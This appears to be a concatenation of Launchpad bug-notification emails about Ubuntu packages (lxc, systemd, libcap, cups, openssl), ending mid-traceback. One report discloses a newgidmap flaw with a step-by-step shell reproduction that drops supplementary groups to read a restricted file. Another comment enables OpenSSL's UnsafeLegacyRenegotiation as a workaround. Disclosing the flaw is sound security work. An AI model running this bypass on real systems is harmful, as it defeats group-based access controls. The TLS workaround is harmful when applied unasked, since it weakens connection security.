[Touch-packages] [Bug 2039873] Re: liblxc-dev was built with LXC_DEVEL=1 in Ubuntu Jammy/Kinetic
> Looking at the changelog, it appears that Serge simply pulled all changes following 5.0.1 from git, which he likely did mistakenly looking at the master branch rather than the stable-5.0 branch which wouldn't have had that particular change. That sounds like exactly what I would do. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/2039873 Title: liblxc-dev was built with LXC_DEVEL=1 in Ubuntu Jammy/Kinetic Status in lxc package in Ubuntu: Confirmed Bug description: [ Impact ] LXC 5.0.0 was built with LXC_DEVEL=1 set for Jammy. But for release build we should have LXC_DEVEL=0. LXC_DEVEL is a variable that appears in the /usr/include/lxc/version.h and then can be (and actually it is) used by other projects to detect if liblxc-dev is a development build or stable. Having LXC_DEVEL=1 makes problems for the users who want to build projects those are depend on liblxc from source (for example, LXD, go-lxc: https://github.com/canonical/lxd/pull/12420). Q: Why it was not a problem for so long? A: Because LXC API was stable for a long time, but recently we have extended liblxc API (https://github.com/lxc/lxc/pull/4260) and dependant package go-lxc was updated too (https://github.com/lxc/go-lxc/pull/166). This change was developed properly to be backward compatible with the old versions of liblxc. But, there is a problem. If LXC_DEVEL=1 then the macro check VERSION_AT_LEAST (https://github.com/lxc/go-lxc/blob/ccae595aa49e779f7ecc9250329967aa546acd31/lxc-binding.h#L7) is disabled. That's why we should *not* have LXC_DEVEL=1 for *any* release build of LXC. [ Test Plan ] Install liblxc-dev package and check /usr/include/lxc/version.h file LXC_DEVEL should be 0 [ Where problems could occur ] Theoretically, build of a software which depends on liblxc-dev may start to fail if it assumes that LXC_DEVEL is 1. [ Other Info ] - To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2039873/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1729357] Re: unprivileged user can drop supplementary groups
** Changed in: shadow (Ubuntu) Importance: Undecided => Low -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1729357 Title: unprivileged user can drop supplementary groups Status in shadow package in Ubuntu: Confirmed Status in shadow package in openSUSE: Fix Released Bug description: Distribution: Ubuntu 16.04.3 LTS Kernel: 4.4.0-97-generic uidmap package version: 1:4.2-3.1ubuntu5.3 The newgidmap setuid executable allows any user to write a single mapping line to the gid_map of a process whose identity is the same as the calling process, as long as that mapping line maps the process's own GID outside of the user namespace to GID 0 inside the user namespace. Newgidmap will write the mapping regardless of the content of /proc/$process_being_mapped/setgroups, which will initially contain the string "allow". After this mapping is performed, and also after the process' uid_map is written with newuidmap, the process in the user namespace will be able to use the setgroups system call to drop supplementary groups. This is possible even if there is no entry for the user in /etc/subgid, because no subordinate GIDs are actually being used. This allows any user to circumvent the use of supplementary groups as blacklists, e.g. for some file owned by root:blacklist with permission bits 0604 (octal). Normally any process whose identity included the group "blacklist" in its supplementary groups would not be able to read that file. By performing this exploit using newgidmap, they can drop all supplementary groups and read that file. If newgidmap was not available, unprivileged users would not be able to write a process's gid_map until writing "deny" to /proc/$pid/setgroups. A fix for this might be for newgidmap to check the content of /proc/$process_being_mapped/setgroups is "deny", but we have not tried to patch this ourselves. An example using 2 login shells for a user named "someone" on Ubuntu Xenial, with the uidmap package installed: Shell 1 someone@ubuntu-xenial:~$ id uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted) someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict -rwr-- 1 root restricted 8 Nov 1 12:23 /tmp/should_restrict someone@ubuntu-xenial:~$ cat /tmp/should_restrict cat: /tmp/should_restrict: Permission denied someone@ubuntu-xenial:~$ unshare -U --setgroups allow # /proc/self/setgroups already contains 'allow', but let's be explicit nobody@ubuntu-xenial:~$ echo $$ 1878 Shell 2 someone@ubuntu-xenial:~$ cat /etc/subuid lxd:10:65536 root:10:65536 ubuntu:165536:65536 someone@ubuntu-xenial:~$ cat /etc/subgid lxd:10:65536 root:10:65536 ubuntu:165536:65536 # There are no entries in /etc/sub{u,g}id for someone, but this doesn't matter that much as subordinate IDs are not being requested. someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1 someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1 Back to shell 1 nobody@ubuntu-xenial:~$ id uid=0(root) gid=0(root) groups=0(root),65534(nogroup) # The presence of the "nogroup" supplementary group indicates that some unmapped GIDs are present as supplementary GIDs. The kernel knows that this process still has "restricted" in its supplementary groups, so it can't read the restricted file yet. nobody@ubuntu-xenial:~$ cat /tmp/should_restrict cat: /tmp/should_restrict: Permission denied # The process has gained CAP_SETGID in its user namespace by becoming UID 0. /proc/$pid/setgroups contains "allow", so it can call setgroups(2). By su-ing to root (itself, in the user namespace), it can drop the supplementary groups. It can't read /root/.bashrc as that file is owned by UID 0 in the initial user namespace, which creates some distracting error output but doesn't matter in this case. nobody@ubuntu-xenial:~$ su root su: Authentication failure (Ignored) bash: /root/.bashrc: Permission denied # Supplementary groups have been dropped root@ubuntu-xenial:~# id uid=0(root) gid=0(root) groups=0(root) # It can read the restricted file root@ubuntu-xenial:~# cat /tmp/should_restrict content To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2012437] [NEW] Ship a static libsystemd.a
Public bug reported: More and more things are requiring linking against libsystemd. In particular, because dbus is now linked against libsystemd, anything that wants to make a dbus client call needs it. By not shipping a static libsystemd.a, all such users are prevented from building statically. This includes tools like the lxc-init container init, and stacker container build tool, which both want to be re-execed inside a container which may have completely different - or no - distro. With the attached debdiff, libsystemd-dev ships a libsystem.a so tools can be built statically. The package has been built (for lunar) with this debdiff at ppa:serge- hallyn/systemd. ** Affects: systemd (Ubuntu) Importance: Undecided Status: New ** Attachment added: "debdiff against lunar's systemd package" https://bugs.launchpad.net/bugs/2012437/+attachment/5656400/+files/systemd_252.5-2ubuntu2.debdiff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/2012437 Title: Ship a static libsystemd.a Status in systemd package in Ubuntu: New Bug description: More and more things are requiring linking against libsystemd. In particular, because dbus is now linked against libsystemd, anything that wants to make a dbus client call needs it. By not shipping a static libsystemd.a, all such users are prevented from building statically. This includes tools like the lxc-init container init, and stacker container build tool, which both want to be re-execed inside a container which may have completely different - or no - distro. With the attached debdiff, libsystemd-dev ships a libsystem.a so tools can be built statically. The package has been built (for lunar) with this debdiff at ppa:serge- hallyn/systemd. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/2012437/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap
> FWIW This used to be the default inside the libcap build tree, but the > problems with the container defaults (eventually fixed with > https://github.com/moby/moby/security/advisories/GHSA-2mm7-x5h6-5pvq Thanks for the links. For a moment I was worried that there was an issue with containers in general, but I see, this is an implementation issue with one container engine implementation. And... they rated the importance low? > ) changed my position on this: > https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=2b5f5635be6131d7e89b4c6244b29f32ebd163c1 Hm. Maybe this is the wrong place to discuss this. I started this comment intending to propose the opposite, but indeed if admins are expected to use pam to set pI per username, then perhaps it is best if they also have to set fI on each program they intend it to exist on, since otherwise they may not *really* be sure what they are handing the user... Andrew, is it your intention to leave libcap's install without the fI? If so then we should either (1) deliverately override Andrew's decision during ubuntu packaging's postinst (which I don't think we should do), or (2) mark this bug Invalid rather than Incomplete. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcap2 in Ubuntu. https://bugs.launchpad.net/bugs/1700814 Title: Default capability of cap_setfcap+i should be set on setcap Status in libcap2 package in Ubuntu: Incomplete Bug description: If I grant a user (via pam_cap) cap_setfcap+i, I would then expect them to be able to use setcap without sudo. setcap is not provided with any default file capabilities however, so either the user has to sudo, or I have to grant the setfcap capability to setcap with setcap. In my mind, it would be reasonable to grant setfcap+i to setcap by default on installation. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap
** Changed in: libcap2 (Ubuntu) Assignee: Serge Hallyn (serge-hallyn) => Balint Reczey (rbalint) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcap2 in Ubuntu. https://bugs.launchpad.net/bugs/1700814 Title: Default capability of cap_setfcap+i should be set on setcap Status in libcap2 package in Ubuntu: New Bug description: If I grant a user (via pam_cap) cap_setfcap+i, I would then expect them to be able to use setcap without sudo. setcap is not provided with any default file capabilities however, so either the user has to sudo, or I have to grant the setfcap capability to setcap with setcap. In my mind, it would be reasonable to grant setfcap+i to setcap by default on installation. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1966590] Re: cups segfault when printing or editing printers
The permission denied errors appear unrelated: after stopping apparmor and restarting cups, I still get: [932499.635684] cupsd[855122]: segfault at 0 ip 7f39be2ff98c sp 7ffc12737718 error 4 in libc.so.6[7f39be176000+195000] [932499.635695] Code: 1e fa 89 f8 31 d2 62 a1 fd 00 ef c0 09 f0 25 ff 0f 00 00 3d 80 0f 00 00 0f 8f 70 03 00 00 62 e1 fe 28 6f 0f 62 b2 75 20 26 d1 <62> f3 75 22 3f 0e 00 c5 fb 93 c9 ff c1 74 45 f3 0f bc d1 0f b6 04 [932503.181032] landscape-packa[855168]: segfault at 7ff7440e7fc0 ip 7ff32fbd3b7a sp 7ffc2e910360 error 4 in apt_pkg.cpython-310-x86_64-linux-gnu.so[7ff32fbcd000+1f000] [932503.181041] Code: 48 8b 55 20 4c 8b 75 28 49 89 c4 8b 52 08 49 8b 46 50 48 8d 14 52 4c 8d 3c d0 4c 39 f8 0f 84 b0 00 00 00 4c 8b 2d 0e 04 03 00 <41> 8b 17 31 f6 4c 89 ef 48 8d 04 d5 00 00 00 00 48 29 d0 49 8b 56 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1966590 Title: cups segfault when printing or editing printers Status in cups package in Ubuntu: New Bug description: Editing a printer in localhost:631, cups keeps segfaulting after (possibly related) access denied messages: [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" operation="connect" profile="/usr/bin/evince" name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" capability=12 capname="net_admin" [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 comm="cups-browsed" capability=23 capname="sys_nice" ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: cups 2.4.1op1-1ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19 Uname: Linux 5.15.0-22-generic x86_64 ApportVersion: 2.20.11-0ubuntu79 Architecture: amd64 CasperMD5CheckResult: pass CupsErrorLog: E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found by cups-browsed. W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job later) CurrentDesktop: qtile Date: Sun Mar 27 08:43:53 2022 InstallationDate: Installed on 2022-02-25 (29 days ago) InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012) Lpstat: device for HP_OfficeJet_200_Mobile_Series: ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/ MachineType: LENOVO 20XXS3JC01 Papersize: letter PpdFiles: Error: command ['fgrep', '-H', '*NickName', '/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied ProcEnviron: TERM=st-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: cups UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago) dmi.bios.date: 12/02/2021 dmi.bios.release: 1.51 dmi.bios.vendor: LENOVO dmi.bios.version: N32ET75W (1.51 ) dmi.board.asset.tag: Not Available dmi.board.name: 20XXS3JC01 dmi.board.vendor: LENOVO dmi.board.version: SDK0J40697 WIN dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: None dmi.ec.firmware.release: 1.32 dmi.modalias: dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9: dmi.product.family: ThinkPad X1 Carbon Gen 9 dmi.product.name: 20XXS3JC01 dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9 dmi.product.version: ThinkPad X1 Carbon Gen 9 dmi.sys.vendor: LENOVO To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1966590/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1966590] Re: cups segfault when printing or editing printers
(Forcibly downgrading to the impish packages restored ability to print.) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1966590 Title: cups segfault when printing or editing printers Status in cups package in Ubuntu: New Bug description: Editing a printer in localhost:631, cups keeps segfaulting after (possibly related) access denied messages: [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" operation="connect" profile="/usr/bin/evince" name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" capability=12 capname="net_admin" [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 comm="cups-browsed" capability=23 capname="sys_nice" ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: cups 2.4.1op1-1ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19 Uname: Linux 5.15.0-22-generic x86_64 ApportVersion: 2.20.11-0ubuntu79 Architecture: amd64 CasperMD5CheckResult: pass CupsErrorLog: E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found by cups-browsed. W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job later) CurrentDesktop: qtile Date: Sun Mar 27 08:43:53 2022 InstallationDate: Installed on 2022-02-25 (29 days ago) InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012) Lpstat: device for HP_OfficeJet_200_Mobile_Series: ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/ MachineType: LENOVO 20XXS3JC01 Papersize: letter PpdFiles: Error: command ['fgrep', '-H', '*NickName', '/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied ProcEnviron: TERM=st-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: cups UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago) dmi.bios.date: 12/02/2021 dmi.bios.release: 1.51 dmi.bios.vendor: LENOVO dmi.bios.version: N32ET75W (1.51 ) dmi.board.asset.tag: Not Available dmi.board.name: 20XXS3JC01 dmi.board.vendor: LENOVO dmi.board.version: SDK0J40697 WIN dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: None dmi.ec.firmware.release: 1.32 dmi.modalias: dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9: dmi.product.family: ThinkPad X1 Carbon Gen 9 dmi.product.name: 20XXS3JC01 dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9 dmi.product.version: ThinkPad X1 Carbon Gen 9 dmi.sys.vendor: LENOVO To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1966590/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1966590] [NEW] cups segfault when printing or editing printers
Public bug reported: Editing a printer in localhost:631, cups keeps segfaulting after (possibly related) access denied messages: [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" operation="connect" profile="/usr/bin/evince" name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" capability=12 capname="net_admin" [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 comm="cups-browsed" capability=23 capname="sys_nice" ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: cups 2.4.1op1-1ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19 Uname: Linux 5.15.0-22-generic x86_64 ApportVersion: 2.20.11-0ubuntu79 Architecture: amd64 CasperMD5CheckResult: pass CupsErrorLog: E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found by cups-browsed. W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job later) CurrentDesktop: qtile Date: Sun Mar 27 08:43:53 2022 InstallationDate: Installed on 2022-02-25 (29 days ago) InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012) Lpstat: device for HP_OfficeJet_200_Mobile_Series: ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/ MachineType: LENOVO 20XXS3JC01 Papersize: letter PpdFiles: Error: command ['fgrep', '-H', '*NickName', '/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied ProcEnviron: TERM=st-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: cups UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago) dmi.bios.date: 12/02/2021 dmi.bios.release: 1.51 dmi.bios.vendor: LENOVO dmi.bios.version: N32ET75W (1.51 ) dmi.board.asset.tag: Not Available dmi.board.name: 20XXS3JC01 dmi.board.vendor: LENOVO dmi.board.version: SDK0J40697 WIN dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: None dmi.ec.firmware.release: 1.32 dmi.modalias: dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9: dmi.product.family: ThinkPad X1 Carbon Gen 9 dmi.product.name: 20XXS3JC01 dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9 dmi.product.version: ThinkPad X1 Carbon Gen 9 dmi.sys.vendor: LENOVO ** Affects: cups (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug jammy -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1966590 Title: cups segfault when printing or editing printers Status in cups package in Ubuntu: New Bug description: Editing a printer in localhost:631, cups keeps segfaulting after (possibly related) access denied messages: [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" operation="connect" profile="/usr/bin/evince" name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" capability=12 capname="net_admin" [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 comm="cups-browsed" capability=23 capname="sys_nice" ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: cups 2.4.1op1-1ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19 Uname: Linux 5.15.0-22-generic x86_64 ApportVersion: 2.20.11-0ubuntu79 Architecture: amd64 CasperMD5CheckResult: pass CupsErrorLog: E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found by cups-browsed. W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job later) CurrentDesktop: qtile Date: Sun Mar 27 08:43:53 2022 InstallationDate: Installed on 2022-02-25 (29 days ago) InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012) Lpstat: device for HP_OfficeJet_200_Mobile_Series: ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/ MachineType: LENOVO 20XXS3JC01 Papersize: letter PpdFiles: Error: command ['fgrep', '-H', '*NickName',
[Touch-packages] [Bug 1966590] Re: cups segfault when printing or editing printers
This makes it impossible for me to print from my laptop :( -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1966590 Title: cups segfault when printing or editing printers Status in cups package in Ubuntu: New Bug description: Editing a printer in localhost:631, cups keeps segfaulting after (possibly related) access denied messages: [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" operation="connect" profile="/usr/bin/evince" name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" capability=12 capname="net_admin" [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 comm="cups-browsed" capability=23 capname="sys_nice" ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: cups 2.4.1op1-1ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19 Uname: Linux 5.15.0-22-generic x86_64 ApportVersion: 2.20.11-0ubuntu79 Architecture: amd64 CasperMD5CheckResult: pass CupsErrorLog: E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found by cups-browsed. W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job later) CurrentDesktop: qtile Date: Sun Mar 27 08:43:53 2022 InstallationDate: Installed on 2022-02-25 (29 days ago) InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012) Lpstat: device for HP_OfficeJet_200_Mobile_Series: ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/ MachineType: LENOVO 20XXS3JC01 Papersize: letter PpdFiles: Error: command ['fgrep', '-H', '*NickName', '/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied ProcEnviron: TERM=st-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: cups UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago) dmi.bios.date: 12/02/2021 dmi.bios.release: 1.51 dmi.bios.vendor: LENOVO dmi.bios.version: N32ET75W (1.51 ) dmi.board.asset.tag: Not Available dmi.board.name: 20XXS3JC01 dmi.board.vendor: LENOVO dmi.board.version: SDK0J40697 WIN dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: None dmi.ec.firmware.release: 1.32 dmi.modalias: dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9: dmi.product.family: ThinkPad X1 Carbon Gen 9 dmi.product.name: 20XXS3JC01 dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9 dmi.product.version: ThinkPad X1 Carbon Gen 9 dmi.sys.vendor: LENOVO To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1966590/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]
Ok, I did get my case to work by creating ~/ssl.conf containing: openssl_conf = openssl_init [openssl_init] ssl_conf = ssl_sect [ssl_sect] system_default = system_default_sect [system_default_sect] Options = UnsafeLegacyRenegotiation And then did OPENSSL_CONF=~/ssl.conf do-my-command that works. I don't know why the system-wide file does not. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1963834 Title: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] Status in openssl package in Ubuntu: New Bug description: Description:Ubuntu Jammy Jellyfish (development branch) Release:22.04 openssl: Installé : 3.0.1-0ubuntu1 Candidat : 3.0.1-0ubuntu1 Table de version : *** 3.0.1-0ubuntu1 500 500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages 100 /var/lib/dpkg/status Using Ubuntu 22.04, I now get the following error message when attempting to connect to our office VPN using "gp-saml-gui (https://github.com/dlenski/gp-saml-gui)" : # dominique@Doombuntu:~$ .local/bin/gp-saml-gui server_url Looking for SAML auth tags in response to https://server_url/global-protect/prelogin.esp... usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] [--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f EXTRA] server [openconnect_extra ...] gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997) # # # gp-saml-gui uses python module requests. Using python ide, I can get the same results : # >>> r = requests.get('https://server_url') Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, in _validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket ssl_sock = _ssl_wrap_socket_impl( File 